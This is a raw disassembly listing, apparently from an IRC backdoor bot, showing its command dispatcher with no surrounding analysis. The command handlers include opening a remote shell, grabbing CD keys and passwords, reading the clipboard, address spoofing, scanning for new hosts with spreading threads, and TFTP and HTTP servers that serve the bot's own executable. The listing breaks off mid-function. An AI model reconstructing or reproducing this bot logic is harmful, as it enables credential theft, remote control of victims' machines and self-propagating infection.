push offset aAliases ; "aliases"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404589
push edi ; Str2
push offset aAl ; "al"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404589
push edi ; Str2
push offset aLog ; "log"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404496
push edi ; Str2
push offset aLg ; "lg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404496
push edi ; Str2
push offset aClearlog ; "clearlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40447D
push edi ; Str2
push offset aClg ; "clg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40447D
push edi ; Str2
push offset aNetinfo ; "netinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404443
push edi ; Str2
push offset aNi ; "ni"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404443
push edi ; Str2
push offset aSysinfo ; "sysinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404418
push edi ; Str2
push offset aSi ; "si"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404418
push edi ; Str2
push offset aRemove ; "remove"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4043DE
push edi ; Str2
push offset aRm ; "rm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4043DE
push edi ; Str2
push offset aProcs ; "procs"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4042BB
push edi ; Str2
push offset aPs ; "ps"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4042BB
push edi ; Str2
push offset aGetcdkeys ; "getcdkeys"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40429D
push edi ; Str2
push offset aKey ; "key"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40429D
push edi ; Str2
push offset aUptime ; "uptime"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404215
push edi ; Str2
push offset aUp ; "up"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404215
push edi ; Str2
push offset aDriveinfo ; "driveinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041F8
push edi ; Str2
push offset aDrv ; "drv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041F8
push edi ; Str2
push offset aTestdlls ; "testdlls"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041DF
push edi ; Str2
push offset aDll ; "dll"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041DF
push edi ; Str2
push offset aOpencmd ; "opencmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041A0
push edi ; Str2
push offset aOcmd ; "ocmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041A0
push edi ; Str2
push offset aCmdstop ; "cmdstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4035F5
push dword ptr [ebp+esi+Args]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_440D20
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4035F5: ; CODE XREF: sub_401CC7+1914�j
push edi ; Str2
push offset aWho ; "who"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_403712
cmp [ebp+var_8], ebx
jnz short loc_403629
push ebx ; int
push [ebp+var_4] ; int
push offset dword_440D30 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_403629: ; CODE XREF: sub_401CC7+1946�j
mov eax, [ebp+arg_18]
mov [ebp+arg_20], ebx
mov [ebp+arg_18], eax
jmp short loc_403637
; ---------------------------------------------------------------------------
loc_403634: ; CODE XREF: sub_401CC7+19BC�j
mov eax, [ebp+arg_18]
loc_403637: ; CODE XREF: sub_401CC7+196B�j
cmp [eax], bl
jz short loc_40363E
inc eax
jmp short loc_403643
; ---------------------------------------------------------------------------
loc_40363E: ; CODE XREF: sub_401CC7+1972�j
mov eax, offset aEmpty ; "<Empty>"
loc_403643: ; CODE XREF: sub_401CC7+1975�j
push eax
lea eax, [ebp+Dst]
push [ebp+arg_20]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add [ebp+arg_18], 80h
add esp, 24h
inc [ebp+arg_20]
cmp [ebp+arg_20], 3
jl short loc_403634
push offset unk_440D54
call sub_415C3F
pop ecx
loc_403690: ; CODE XREF: sub_401CC7+1C4B�j
; sub_401CC7+2F34�j
mov eax, dword ptr [ebp+esi+Args]
cmp eax, ebx
mov [ebp+Source], eax
jz loc_402085
push edi ; Str2
push offset aSpoof ; "spoof"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404CE8
mov esi, [ebp+Source]
push offset Str2 ; "off"
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404C0D
lea eax, [ebp+Dst]
push offset asc_441298 ; "-"
push eax ; Dest
mov dword_4E68F0, ebx
call _sprintf
pop ecx
pop ecx
loc_4036E8: ; CODE XREF: sub_401CC7+301C�j
cmp [ebp+var_8], ebx
jnz loc_409B16
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
loc_40370A: ; CODE XREF: sub_401CC7+71C1�j
add esp, 14h
jmp loc_409B16
; ---------------------------------------------------------------------------
loc_403712: ; CODE XREF: sub_401CC7+193D�j
push edi ; Str2
push offset aGetclip ; "getclip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40415F
push edi ; Str2
push offset aGc ; "gc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40415F
push edi ; Str2
push offset aFlusharp ; "flusharp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404148
push edi ; Str2
push offset aFarp ; "farp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404148
push edi ; Str2
push offset aFlushdns ; "flushdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404110
push edi ; Str2
push offset aFdns ; "fdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404110
push edi ; Str2
push offset aCurrentip ; "currentip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4040D6
push edi ; Str2
push offset aCip ; "cip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4040D6
push edi ; Str2
push offset aRloginserver ; "rloginserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F9B
push edi ; Str2
push offset aRlogin ; "rlogin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F9B
push edi ; Str2
push offset aHttpserver ; "httpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403E0F
push edi ; Str2
push offset aHttp ; "http"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403E0F
push edi ; Str2
push offset aTftpserver ; "tftpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403CD5
push edi ; Str2
push offset aTftp ; "tftp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403CD5
push edi ; Str2
push offset aCrash ; "crash"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40389E
lea eax, [ebp+Dst]
push offset asc_441084 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_40387D
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_40387D: ; CODE XREF: sub_401CC7+1B98�j
lea eax, [ebp+Dst]
push eax ; Str2
call sub_415C3F
mov [esp+5D98h+var_5D98], offset aCrash_0 ; "crash"
push [ebp+esi+var_7C] ; Str1
call _strcmp
jmp loc_40226E
; ---------------------------------------------------------------------------
loc_40389E: ; CODE XREF: sub_401CC7+1B80�j
push edi ; Str2
push offset aScanall ; "scanall"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4039D1
push edi ; Str2
push offset aSa ; "sa"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4039D1
push edi ; Str2
push offset aPhonehome ; "phonehome"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4038F2
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
jmp loc_402143
; ---------------------------------------------------------------------------
loc_4038F2: ; CODE XREF: sub_401CC7+1C10�j
push edi ; Str2
push offset aFindpass ; "findpass"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_403918
push edi ; Str2
push offset aFp ; "fp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_403690
loc_403918: ; CODE XREF: sub_401CC7+1C3A�j
push [ebp+Format] ; Format
lea eax, [ebp+var_F54]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_F58], eax
mov eax, [ebp+var_4]
mov [ebp+var_ED0], eax
mov eax, [ebp+var_8]
mov [ebp+var_ECC], eax
push offset asc_441228 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 26h ; int
push eax ; Source
call sub_40B756
add esp, 18h
mov [ebp+var_ED4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_F58]
push ebx
push eax
push offset sub_417A8B
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_ED4]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4039C0
loc_4039AA: ; CODE XREF: sub_401CC7+1CF7�j
cmp [ebp+var_EC8], ebx
jnz loc_408637
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4039AA
; ---------------------------------------------------------------------------
loc_4039C0: ; CODE XREF: sub_401CC7+1CE1�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_441250
jmp loc_408628
; ---------------------------------------------------------------------------
loc_4039D1: ; CODE XREF: sub_401CC7+1BE6�j
; sub_401CC7+1BFB�j
mov al, byte_448402
mov [ebp+Src], ebx
cmp al, bl
mov edx, offset byte_448402
jz loc_402085
mov ecx, edx
loc_4039E8: ; CODE XREF: sub_401CC7+1D29�j
inc [ebp+Src]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4039E8
cmp al, bl
jz loc_402085
mov [ebp+arg_18], edx
mov esi, offset a2 ; "#2"
loc_403A02: ; CODE XREF: sub_401CC7+1FF9�j
push 0Bh
call sub_40B99E
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+Src]
add eax, ecx
cmp eax, 1F4h
jle short loc_403A51
push ecx
lea eax, [ebp+Dst]
push offset asc_4410B4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 20h
jmp loc_403CB7
; ---------------------------------------------------------------------------
loc_403A51: ; CODE XREF: sub_401CC7+1D55�j
or [ebp+var_730], 0FFFFFFFFh
cmp dword_448220, ebx
mov [ebp+var_734], 64h
mov [ebp+var_748], 5
mov [ebp+var_744], 320h
mov [ebp+Src], ebx
jz short loc_403AC2
mov edi, offset dword_448220
loc_403A86: ; CODE XREF: sub_401CC7+1DDD�j
mov eax, [ebp+arg_18]
add eax, 0FFFFFFF6h
push eax ; Str2
lea eax, [edi-28h]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_403AA8
inc [ebp+Src]
add edi, 40h
cmp [edi], ebx
jnz short loc_403A86
jmp short loc_403AC2
; ---------------------------------------------------------------------------
loc_403AA8: ; CODE XREF: sub_401CC7+1DD3�j
mov eax, [ebp+Src]
mov ecx, eax
mov [ebp+var_730], eax
shl ecx, 6
mov ecx, dword_448220[ecx]
mov [ebp+var_74C], ecx
loc_403AC2: ; CODE XREF: sub_401CC7+1DB8�j
; sub_401CC7+1DDF�j
cmp [ebp+var_74C], ebx
jz loc_403CCB
push 10h
lea eax, [ebp+var_2CC]
pop edi
push eax
lea eax, [ebp+var_30C]
push eax
mov [ebp+var_2CC], edi
push [ebp+arg_4]
call dword_4E309C ; getsockname
mov al, [ebp+var_8FF]
push edi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+Count], eax
push [ebp+Count] ; Count
call dword_4E3184 ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_860]
push eax ; Dest
call _strncpy
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_860]
push eax ; Str
call _strrchr
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+File+3], bl
jle short loc_403B6A
loc_403B48: ; CODE XREF: sub_401CC7+1EA1�j
cmp eax, ebx
jz short loc_403B6A
mov byte ptr [eax], 78h
lea eax, [ebp+var_860]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, edi
jl short loc_403B48
loc_403B6A: ; CODE XREF: sub_401CC7+1E7F�j
; sub_401CC7+1E83�j
mov eax, [ebp+arg_4]
push [ebp+Format] ; Format
mov [ebp+var_750], eax
mov eax, [ebp+var_4]
mov [ebp+var_728], eax
mov eax, [ebp+var_8]
mov [ebp+var_724], eax
mov edi, 80h
lea eax, [ebp+var_850]
push edi ; Count
push eax ; Dest
mov [ebp+var_720], 1
call __snprintf
push offset byte_4E2FA0 ; Str2
push esi ; Str1
call _strcmp
add esp, 14h
test eax, eax
jz short loc_403BCC
push esi ; Format
lea eax, [ebp+var_7D0]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_403BD2
; ---------------------------------------------------------------------------
loc_403BCC: ; CODE XREF: sub_401CC7+1EF0�j
mov [ebp+var_7D0], bl
loc_403BD2: ; CODE XREF: sub_401CC7+1F03�j
cmp [ebp+var_720], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_403BE4
mov eax, offset aSequential ; "Sequential"
loc_403BE4: ; CODE XREF: sub_401CC7+1F16�j
push [ebp+var_734]
lea ecx, [ebp+var_860]
push [ebp+var_744]
push [ebp+var_748]
push [ebp+var_74C]
push ecx
push eax
lea eax, [ebp+Dst]
push offset asc_441140 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B756
add esp, 2Ch
mov [ebp+var_740], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40CB69
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_740]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_403C6E
loc_403C5C: ; CODE XREF: sub_401CC7+1FA5�j
cmp [ebp+var_71C], ebx
jnz short loc_403C89
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_403C5C
; ---------------------------------------------------------------------------
loc_403C6E: ; CODE XREF: sub_401CC7+1F93�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset asc_4411AC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_403C89: ; CODE XREF: sub_401CC7+1F9B�j
cmp [ebp+var_8], ebx
jnz short loc_403CAA
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_403CAA: ; CODE XREF: sub_401CC7+1FC5�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
pop ecx
loc_403CB7: ; CODE XREF: sub_401CC7+1D85�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_403A02
jmp loc_402085
; ---------------------------------------------------------------------------
loc_403CCB: ; CODE XREF: sub_401CC7+1E01�j
push offset unk_4410F4
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_403CD5: ; CODE XREF: sub_401CC7+1B56�j
; sub_401CC7+1B6B�j
push 5
call sub_40B99E
test eax, eax
pop ecx
jle short loc_403CEB
push offset unk_440FEC
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_403CEB: ; CODE XREF: sub_401CC7+2018�j
mov eax, dword ptr [ebp+esi+Args]
cmp eax, ebx
jz short loc_403D0E
push eax ; Format
mov edi, 104h
lea eax, [ebp+var_2D50]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_403D22
; ---------------------------------------------------------------------------
loc_403D0E: ; CODE XREF: sub_401CC7+202D�j
mov edi, 104h
lea eax, [ebp+var_2D50]
push edi
push eax
push ebx
call ds:dword_4F5344 ; GetModuleFileNameA
loc_403D22: ; CODE XREF: sub_401CC7+2045�j
mov esi, [ebp+esi+Format]
cmp esi, ebx
jnz short loc_403D32
mov esi, offset Str ; "nlzhxmpyrjsyle.exe"
loc_403D32: ; CODE XREF: sub_401CC7+2064�j
push esi ; Format
lea eax, [ebp+var_2C4C]
push edi ; Count
push eax ; Dest
call __snprintf
mov eax, dword_43F078
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_2B40], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2B44], ebx
mov [ebp+var_2D54], eax
lea eax, [ebp+var_2B3C]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_2ABC], eax
mov eax, [ebp+var_8]
mov [ebp+var_2AB8], eax
lea eax, [ebp+var_2D50]
push eax
lea eax, [ebp+Dst]
push [ebp+var_2B40]
push offset asc_44100C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 5 ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_2B48], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2D54]
push ebx
push eax
push offset sub_412217
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2B48]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_403DFE
loc_403DE8: ; CODE XREF: sub_401CC7+2135�j
cmp [ebp+var_2AB4], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_403DE8
; ---------------------------------------------------------------------------
loc_403DFE: ; CODE XREF: sub_401CC7+211F�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_441040
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_403E0F: ; CODE XREF: sub_401CC7+1B2C�j
; sub_401CC7+1B41�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_403E2E
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_403E2E
push edi ; Str
call _atoi
pop ecx
jmp short loc_403E33
; ---------------------------------------------------------------------------
loc_403E2E: ; CODE XREF: sub_401CC7+2151�j
; sub_401CC7+215C�j
mov eax, dword_43F07C
loc_403E33: ; CODE XREF: sub_401CC7+2165�j
mov esi, [ebp+esi+Format]
mov [ebp+var_36C8], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_36B4], eax
jz short loc_403E66
lea eax, [ebp+var_37CC]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_403E91
; ---------------------------------------------------------------------------
loc_403E66: ; CODE XREF: sub_401CC7+218C�j
lea eax, [ebp+FullPath]
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
add esp, 14h
loc_403E91: ; CODE XREF: sub_401CC7+219D�j
lea eax, [ebp+var_37CC]
push eax ; Str
call _strlen
cmp [ebp+eax+var_37CD], 5Ch
pop ecx
jnz short loc_403EBC
lea eax, [ebp+var_37CC]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_37CD], bl
loc_403EBC: ; CODE XREF: sub_401CC7+21DF�j
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
lea eax, [ebp+var_3A54]
mov [ebp+var_3A58], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_36B8], eax
lea eax, [ebp+var_37CC]
mov [ebp+var_36BC], edi
push eax
push [ebp+var_36C8]
push esi
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_440F60 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 3 ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_36C0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3A58]
push ebx
push eax
push offset sub_40FB50
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_36C0]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_403F70
loc_403F5E: ; CODE XREF: sub_401CC7+22A7�j
cmp [ebp+var_36AC], ebx
jnz short loc_403F8B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_403F5E
; ---------------------------------------------------------------------------
loc_403F70: ; CODE XREF: sub_401CC7+2295�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset asc_440F9C ; "-"
loc_403F7C: ; CODE XREF: sub_401CC7+240A�j
; sub_401CC7+4D85�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_403F8B: ; CODE XREF: sub_401CC7+229D�j
; sub_401CC7+23EE�j ...
cmp [ebp+var_8], ebx
jnz loc_408637
push ebx
push edi
jmp loc_407500
; ---------------------------------------------------------------------------
loc_403F9B: ; CODE XREF: sub_401CC7+1B02�j
; sub_401CC7+1B17�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_403FBA
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_403FBA
push edi ; Str
call _atoi
pop ecx
jmp short loc_403FBF
; ---------------------------------------------------------------------------
loc_403FBA: ; CODE XREF: sub_401CC7+22DD�j
; sub_401CC7+22E8�j
mov eax, dword_43F080
loc_403FBF: ; CODE XREF: sub_401CC7+22F1�j
mov [ebp+var_1824], eax
mov eax, [ebp+esi+Format]
cmp eax, ebx
jnz short loc_403FD6
lea eax, [ebp+var_C0]
loc_403FD6: ; CODE XREF: sub_401CC7+2307�j
push eax ; Format
lea eax, [ebp+var_1964]
push 40h ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+Str2]
add esp, 0Ch
cmp esi, ebx
jnz short loc_403FF8
mov esi, offset dword_4E2F9C
loc_403FF8: ; CODE XREF: sub_401CC7+232A�j
push esi ; Format
lea eax, [ebp+var_1924]
push 100h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_19E4]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1810], eax
lea eax, [ebp+var_1964]
push eax
mov [ebp+var_19E8], esi
push [ebp+var_1824]
mov [ebp+var_1814], edi
push esi
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_440ED4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 9 ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_1820], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_19E8]
push ebx
push eax
push offset sub_4114CE
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1820]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4040C5
loc_4040AF: ; CODE XREF: sub_401CC7+23FC�j
cmp [ebp+var_180C], ebx
jnz loc_403F8B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4040AF
; ---------------------------------------------------------------------------
loc_4040C5: ; CODE XREF: sub_401CC7+23E6�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_440F10
jmp loc_403F7C
; ---------------------------------------------------------------------------
loc_4040D6: ; CODE XREF: sub_401CC7+1AD8�j
; sub_401CC7+1AED�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4040E9
push esi ; Str
call _atoi
jmp short loc_4040F0
; ---------------------------------------------------------------------------
loc_4040E9: ; CODE XREF: sub_401CC7+2418�j
push 0Bh
call sub_40B9BD
loc_4040F0: ; CODE XREF: sub_401CC7+2420�j
cmp eax, ebx
pop ecx
jz loc_409B16
push eax ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40C0B6
jmp loc_4045A4
; ---------------------------------------------------------------------------
loc_404110: ; CODE XREF: sub_401CC7+1AAE�j
; sub_401CC7+1AC3�j
mov eax, dword_4E3014
cmp eax, ebx
jz short loc_40412D
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_404126
push offset unk_440E30
jmp short loc_404132
; ---------------------------------------------------------------------------
loc_404126: ; CODE XREF: sub_401CC7+2456�j
push offset unk_440E54
jmp short loc_404132
; ---------------------------------------------------------------------------
loc_40412D: ; CODE XREF: sub_401CC7+2450�j
push offset asc_440E80 ; "-"
loc_404132: ; CODE XREF: sub_401CC7+245D�j
; sub_401CC7+2464�j ...
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_406F56
; ---------------------------------------------------------------------------
loc_404148: ; CODE XREF: sub_401CC7+1A84�j
; sub_401CC7+1A99�j
call sub_40AE8D
test eax, eax
jz short loc_404158
push offset unk_440DCC
jmp short loc_404132
; ---------------------------------------------------------------------------
loc_404158: ; CODE XREF: sub_401CC7+2488�j
push offset unk_440DF0
jmp short loc_404132
; ---------------------------------------------------------------------------
loc_40415F: ; CODE XREF: sub_401CC7+1A5A�j
; sub_401CC7+1A6F�j
cmp [ebp+var_8], ebx
jnz short loc_40417E
push ebx ; int
push [ebp+var_4] ; int
push offset dword_440D84 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_40417E: ; CODE XREF: sub_401CC7+249B�j
push ebx ; int
push [ebp+var_4] ; int
call sub_418EEF
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
push offset dword_440D9C
jmp loc_404470
; ---------------------------------------------------------------------------
loc_4041A0: ; CODE XREF: sub_401CC7+18EA�j
; sub_401CC7+18FF�j
push 0Ah
call sub_40B99E
test eax, eax
pop ecx
jle short loc_4041B6
push offset unk_440C94
jmp loc_4098C3
; ---------------------------------------------------------------------------
loc_4041B6: ; CODE XREF: sub_401CC7+24E3�j
push [ebp+Format]
push [ebp+arg_4]
call sub_41AB45
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4041D5
push offset unk_440CC0
jmp loc_4098C3
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_401CC7+2502�j
push offset unk_440CE8
jmp loc_4098C3
; ---------------------------------------------------------------------------
loc_4041DF: ; CODE XREF: sub_401CC7+18C0�j
; sub_401CC7+18D5�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40AA90
jmp loc_402082
; ---------------------------------------------------------------------------
loc_4041F8: ; CODE XREF: sub_401CC7+1896�j
; sub_401CC7+18AB�j
push dword ptr [ebp+esi+Args] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41779D
jmp loc_402082
; ---------------------------------------------------------------------------
loc_404215: ; CODE XREF: sub_401CC7+186C�j
; sub_401CC7+1881�j
or edi, 0FFFFFFFFh
call ds:dword_4F537C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+Src], eax
jz short loc_40423E
push esi ; Str
call _atoi
pop ecx
mov edi, eax
loc_40423E: ; CODE XREF: sub_401CC7+256C�j
mov eax, [ebp+Src]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_404257
cmp edi, 0FFFFFFFFh
jnz loc_409B16
loc_404257: ; CODE XREF: sub_401CC7+2585�j
push ebx
call sub_41B76F
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_440C4C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
lea eax, [ebp+Dst]
push eax
call sub_415C3F
loc_404295: ; CODE XREF: sub_401CC7+531D�j
add esp, 24h
jmp loc_409B16
; ---------------------------------------------------------------------------
loc_40429D: ; CODE XREF: sub_401CC7+1842�j
; sub_401CC7+1857�j
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
call sub_416591
add esp, 0Ch
push offset dword_440C20
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_4042BB: ; CODE XREF: sub_401CC7+1818�j
; sub_401CC7+182D�j
